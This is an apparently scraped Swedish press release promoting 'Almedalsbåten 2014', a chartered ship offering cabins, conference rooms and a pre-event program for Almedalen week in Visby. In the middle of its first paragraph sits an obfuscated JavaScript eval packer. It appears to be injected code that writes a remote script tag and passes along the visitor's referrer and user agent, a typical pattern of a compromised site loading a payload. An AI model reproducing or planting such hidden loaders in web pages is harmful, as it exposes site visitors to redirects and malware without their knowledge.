Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

”Hyreschock i Almedalen”

”Hyreschock i Almedalen”

Flera eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rezdt|var|u0026u|referrer|aknre||js|php’.split(’|’),0,{}))
medier har den senaste veckan rapporterat om den tuffa fajten kring sängplatser i Visby under Almedalsveckan och att en hyreschock väntar. Det är stort uppslaget i bland annat Dagens Industri och i Gotlandstidningarna. Läs mer på 
dagensps.se

Men det behöver inte vara så dyrt att åka till och bo i Visby under Almedalsveckan. Mer om kostnadseffektivt boende, som ligger 200 meter från Almedalsområdet, finns på almedalsbaten.se/hytter

Skola och välfärd

De viktigaste frågorna i den politiska debatten de senaste dagarna har, förutom försvarspolitiken, varit skolan och vinster i välfärden. Men vilka är din organisations viktigaste frågor? Och var ska du driva dem någonstans i Almedalen? Här finns några nya alternativ: almedalsbaten.se/lokaler

Årets superuppladdning

Supervalårets Almedalsvecka startar på Almedalsbåten. På den leder den politiske

journalisten K-G Bergström det stora inför-Almedals-programmet. De som reser med får höra intressanta talare, debatter och analyser av vad som förväntas under veckan. Det finns fortfarande lediga rum kvar i flera av fartygets olika boendekategorier. Förutom superuppladdningsprogrammet inkluderar priserna boende, resa och frukost.

Nya möjligheter

Almedalsbåtens lokaler lämpar sig för seminarier, konferenser, mingel, mässor eller andra evenemang under Almedalsveckan. Det finns både mindre konferensrum för ett fåtal personer och upp till nyrenoverade Étage med plats för upp till 1 000 personer. Läs mer om olika möjligheter på almedalsbaten.se/lokaler

Buss till båten

Till Almedalsbåten går det kryssningsbussar från drygt 80 orter runt om i Sverige. Ett smidigt sätt att ta sig direkt till och från Almedalsbåtens terminal i Stockholm för 250 kronor tur och retur.

Almedalsbåten i korthet

Almedalsbåten erbjuder sex nätters boende från den 28 juni till den 4 juli samt resa tur och retur från centrala Stockholm till Visby under Almedalsveckan. Bakom Almedalsbåten står PR- och eventbyrån Think Image, som har chartrat båten MS Cinderella av Viking Line. Mer information finns på almedalsbaten.se

Välkomna till Almedalsbåten 2014!

Boka nu på 021-41 72 05 eller www.almedalsbaten.se

Detta är ett pressmeddelade från Almedalesbåten